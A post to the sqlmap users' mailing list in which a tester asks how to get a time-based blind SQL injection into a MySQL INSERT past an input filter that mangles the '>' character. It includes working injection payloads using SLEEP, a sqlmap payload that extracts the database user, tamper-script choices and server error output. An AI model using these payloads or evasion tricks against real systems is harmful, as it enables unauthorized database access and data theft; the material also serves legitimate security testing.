Hey guys, I have a server at work where there's an SQLi in an INSERT,
but I can't prove that it's actually a threat so far due to a little
"filter" that replaces some input characters.
I crafted a little injection that injects a sleep into the insert, and
makes it sleep for 10 seconds, and then doesn't insert anything (due to
a duplicate error that I made sure to get).
The original query looks like this:
insert into discount_phone_registry (phone_nbr,reg_date) values
('111',date(now()));.
And the injection is in the phone_nbr, so I made the following
injection: 111',(SLEEP(10))),('111
And it then becomes: insert into discount_phone_registry
(phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
So, so far so good, right?
Well when I wanted to use sqlmap, I noticed that our filter is doing
some stupid things ^^
This is the payload from sqlmap
111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
But as it gets submitted in the form, it becomes
111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
Notice how the > became a _
The tampering scripts I'm using are space2comment and charencode, and
charencode actually seems to trick it, since I'm getting the less/grater
char in the error output from the web server now.
If I copy/paste the payload directly from the web server error output,
directly into the MySQL client and run it, it works.
Is there anything else I can try to get this to work?
PS: If it helps I just noticed this!
1064 - You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
insert into discount_phone_registry (phone_nbr,reg_date) values
('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
Notice how it complains on ";16" which is probably the encoded > sign
(>).
Thanks in advance! :-)
------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
